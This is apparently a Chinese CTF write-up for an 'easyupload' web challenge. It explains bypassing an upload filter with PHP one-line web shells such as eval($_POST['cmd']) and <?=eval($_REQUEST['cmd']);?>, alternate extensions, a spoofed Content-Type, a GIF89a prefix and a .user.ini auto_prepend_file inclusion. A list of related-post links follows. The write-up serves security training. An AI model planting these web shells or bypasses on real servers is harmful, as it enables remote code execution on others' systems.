攻防世界35-easyupload-CTFWeb

攻防世界35-easyupload-CTFWeb

通过各种上传发现,过滤了php后缀和内容中有php的文件

有这几种方式上传一句话木马

<script language="php">eval($_POST[1]);</script>
<?php eval($_POST['cmd']);?>
<?= eval($_POST['cmd']);?>

那么如果过滤php的话只能用最后一种方式

上传时也要注意Content-Type: text/jpg

上传名称后缀为.phtml .phps .php5 .pht等(可以自行FUZZ测试,自己找字典)

这题我不会做,也是看题解的

学会一种新方式:

.user.ini绕过

.user.ini中两个中的配置就是auto_prepend_file和auto_append_file。这两个配置的意思就是:我们指定一个文件(如1.jpg),那么该文件就会被包含在要执行的php文件中(如index.php),相当于在index.php中插入一句:require(./1.jpg)。这两个设置的区别只是在于auto_prepend_file是在文件前插入,auto_append_file在文件最后插入。

利用.user.ini的前提是服务器开启了CGI或者FastCGI ,并且上传文件的存储路径下有index.php可执行文件。

所以本题我们要想上传并且执行,首先上传.user.ini文件,然后上传一个图片。

可以新建.user.ini文件,内容如下

GIF89a
auto_prepend_file=a.jpg

上传并更改Content-Type: image/jpeg

然后创建a.jpg,内容为

GIF89a
<?=eval($_REQUEST['cmd']);?>

用蚁剑连接即可
<?=eval($_REQUEST['cmd']);?>

用蚁剑连接即可

![image-20241110152027401](https://img-blog.csdnimg.cn/img_convert/2201b0243af346f87c1e51fb8fc5c786.png)
相关推荐
白总Server11 分钟前
UI架构解说
大数据·服务器·网络·数据库·web安全·架构·数据库架构
Peter_chq30 分钟前
【计算机网络】网络框架
linux·c语言·开发语言·网络·c++·后端·网络协议
jimsten1 小时前
Java学习--网络编程
java·网络·学习
kinlon.liu1 小时前
什么是等保2.0
服务器·网络·安全·防火墙·waf·等级保护
学习向前冲1 小时前
华为交换机配置默认路由
服务器·网络·华为
One_Blanks1 小时前
网络安全-蓝队基础
网络·安全·hw·蓝队
网安墨雨1 小时前
什么是网络安全CTF有何意义?该如何入门?
安全·web安全
小周不摆烂2 小时前
丹摩征文活动 |丹摩智算平台:网络安全的守护与挑战
网络
咸虾米_2 小时前
uniCloud云对象调用第三方接口,根据IP获取用户归属地的免费API接口,亲测可用
网络·uni-app·unicloud
杰森V+2 小时前
融云:社交泛娱乐出海机会尚存,跨境电商异军突起
网络·云计算